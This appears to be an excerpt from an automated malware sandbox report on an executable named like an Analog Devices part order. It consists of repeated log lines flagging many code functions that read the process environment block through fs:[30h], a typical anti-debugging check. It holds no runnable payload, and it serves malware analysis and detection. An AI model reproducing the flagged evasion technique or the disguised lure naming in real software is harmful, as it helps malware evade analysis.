Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BC3CD mov eax, dword ptr fs:[00000030h]	2_2_017BC3CD
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017863C0 mov eax, dword ptr fs:[00000030h]	2_2_017863C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FE388 mov eax, dword ptr fs:[00000030h]	2_2_016FE388
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FE388 mov eax, dword ptr fs:[00000030h]	2_2_016FE388
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FE388 mov eax, dword ptr fs:[00000030h]	2_2_016FE388
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F8397 mov eax, dword ptr fs:[00000030h]	2_2_016F8397
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F8397 mov eax, dword ptr fs:[00000030h]	2_2_016F8397
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F8397 mov eax, dword ptr fs:[00000030h]	2_2_016F8397
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172438F mov eax, dword ptr fs:[00000030h]	2_2_0172438F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172438F mov eax, dword ptr fs:[00000030h]	2_2_0172438F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F826B mov eax, dword ptr fs:[00000030h]	2_2_016F826B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01704260 mov eax, dword ptr fs:[00000030h]	2_2_01704260
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01704260 mov eax, dword ptr fs:[00000030h]	2_2_01704260
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01704260 mov eax, dword ptr fs:[00000030h]	2_2_01704260
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D625D mov eax, dword ptr fs:[00000030h]	2_2_017D625D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706259 mov eax, dword ptr fs:[00000030h]	2_2_01706259
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BA250 mov eax, dword ptr fs:[00000030h]	2_2_017BA250
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BA250 mov eax, dword ptr fs:[00000030h]	2_2_017BA250
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01788243 mov eax, dword ptr fs:[00000030h]	2_2_01788243
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01788243 mov ecx, dword ptr fs:[00000030h]	2_2_01788243
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FA250 mov eax, dword ptr fs:[00000030h]	2_2_016FA250
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F823B mov eax, dword ptr fs:[00000030h]	2_2_016F823B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017102E1 mov eax, dword ptr fs:[00000030h]	2_2_017102E1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017102E1 mov eax, dword ptr fs:[00000030h]	2_2_017102E1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017102E1 mov eax, dword ptr fs:[00000030h]	2_2_017102E1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D62D6 mov eax, dword ptr fs:[00000030h]	2_2_017D62D6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0170A2C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0170A2C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0170A2C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0170A2C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0170A2C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017102A0 mov eax, dword ptr fs:[00000030h]	2_2_017102A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017102A0 mov eax, dword ptr fs:[00000030h]	2_2_017102A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]	2_2_017962A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017962A0 mov ecx, dword ptr fs:[00000030h]	2_2_017962A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]	2_2_017962A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]	2_2_017962A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]	2_2_017962A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]	2_2_017962A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E284 mov eax, dword ptr fs:[00000030h]	2_2_0173E284
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E284 mov eax, dword ptr fs:[00000030h]	2_2_0173E284
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01780283 mov eax, dword ptr fs:[00000030h]	2_2_01780283
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01780283 mov eax, dword ptr fs:[00000030h]	2_2_01780283
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01780283 mov eax, dword ptr fs:[00000030h]	2_2_01780283
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173656A mov eax, dword ptr fs:[00000030h]	2_2_0173656A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173656A mov eax, dword ptr fs:[00000030h]	2_2_0173656A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173656A mov eax, dword ptr fs:[00000030h]	2_2_0173656A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01708550 mov eax, dword ptr fs:[00000030h]	2_2_01708550
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01708550 mov eax, dword ptr fs:[00000030h]	2_2_01708550
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]	2_2_01710535
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]	2_2_01710535
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]	2_2_01710535
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]	2_2_01710535
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]	2_2_01710535
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]	2_2_01710535
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]	2_2_0172E53E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]	2_2_0172E53E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]	2_2_0172E53E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]	2_2_0172E53E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]	2_2_0172E53E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01796500 mov eax, dword ptr fs:[00000030h]	2_2_01796500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]	2_2_017D4500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]	2_2_017D4500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]	2_2_017D4500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]	2_2_017D4500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]	2_2_017D4500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]	2_2_017D4500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]	2_2_017D4500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017025E0 mov eax, dword ptr fs:[00000030h]	2_2_017025E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0172E5E7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0172E5E7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0172E5E7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0172E5E7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0172E5E7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0172E5E7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0172E5E7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0172E5E7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173C5ED mov eax, dword ptr fs:[00000030h]	2_2_0173C5ED
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173C5ED mov eax, dword ptr fs:[00000030h]	2_2_0173C5ED
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017065D0 mov eax, dword ptr fs:[00000030h]	2_2_017065D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0173A5D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0173A5D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E5CF mov eax, dword ptr fs:[00000030h]	2_2_0173E5CF
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E5CF mov eax, dword ptr fs:[00000030h]	2_2_0173E5CF
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017245B1 mov eax, dword ptr fs:[00000030h]	2_2_017245B1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017245B1 mov eax, dword ptr fs:[00000030h]	2_2_017245B1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017805A7 mov eax, dword ptr fs:[00000030h]	2_2_017805A7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017805A7 mov eax, dword ptr fs:[00000030h]	2_2_017805A7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017805A7 mov eax, dword ptr fs:[00000030h]	2_2_017805A7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E59C mov eax, dword ptr fs:[00000030h]	2_2_0173E59C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01702582 mov eax, dword ptr fs:[00000030h]	2_2_01702582
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01702582 mov ecx, dword ptr fs:[00000030h]	2_2_01702582
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01734588 mov eax, dword ptr fs:[00000030h]	2_2_01734588
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172A470 mov eax, dword ptr fs:[00000030h]	2_2_0172A470
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172A470 mov eax, dword ptr fs:[00000030h]	2_2_0172A470
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172A470 mov eax, dword ptr fs:[00000030h]	2_2_0172A470
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178C460 mov ecx, dword ptr fs:[00000030h]	2_2_0178C460
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172245A mov eax, dword ptr fs:[00000030h]	2_2_0172245A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BA456 mov eax, dword ptr fs:[00000030h]	2_2_017BA456
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]	2_2_0173E443
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]	2_2_0173E443
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]	2_2_0173E443
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]	2_2_0173E443
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]	2_2_0173E443
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]	2_2_0173E443
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]	2_2_0173E443
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]	2_2_0173E443
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F645D mov eax, dword ptr fs:[00000030h]	2_2_016F645D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FC427 mov eax, dword ptr fs:[00000030h]	2_2_016FC427
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FE420 mov eax, dword ptr fs:[00000030h]	2_2_016FE420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FE420 mov eax, dword ptr fs:[00000030h]	2_2_016FE420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FE420 mov eax, dword ptr fs:[00000030h]	2_2_016FE420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]	2_2_01786420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]	2_2_01786420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]	2_2_01786420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]	2_2_01786420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]	2_2_01786420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]	2_2_01786420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]	2_2_01786420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01738402 mov eax, dword ptr fs:[00000030h]	2_2_01738402
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01738402 mov eax, dword ptr fs:[00000030h]	2_2_01738402
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01738402 mov eax, dword ptr fs:[00000030h]	2_2_01738402
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017004E5 mov ecx, dword ptr fs:[00000030h]	2_2_017004E5
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017344B0 mov ecx, dword ptr fs:[00000030h]	2_2_017344B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178A4B0 mov eax, dword ptr fs:[00000030h]	2_2_0178A4B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017064AB mov eax, dword ptr fs:[00000030h]	2_2_017064AB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BA49A mov eax, dword ptr fs:[00000030h]	2_2_017BA49A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01708770 mov eax, dword ptr fs:[00000030h]	2_2_01708770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700750 mov eax, dword ptr fs:[00000030h]	2_2_01700750
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742750 mov eax, dword ptr fs:[00000030h]	2_2_01742750
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742750 mov eax, dword ptr fs:[00000030h]	2_2_01742750
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178E75D mov eax, dword ptr fs:[00000030h]	2_2_0178E75D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01784755 mov eax, dword ptr fs:[00000030h]	2_2_01784755
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173674D mov esi, dword ptr fs:[00000030h]	2_2_0173674D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173674D mov eax, dword ptr fs:[00000030h]	2_2_0173674D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173674D mov eax, dword ptr fs:[00000030h]	2_2_0173674D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177C730 mov eax, dword ptr fs:[00000030h]	2_2_0177C730
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173273C mov eax, dword ptr fs:[00000030h]	2_2_0173273C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173273C mov ecx, dword ptr fs:[00000030h]	2_2_0173273C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173273C mov eax, dword ptr fs:[00000030h]	2_2_0173273C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173C720 mov eax, dword ptr fs:[00000030h]	2_2_0173C720
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173C720 mov eax, dword ptr fs:[00000030h]	2_2_0173C720
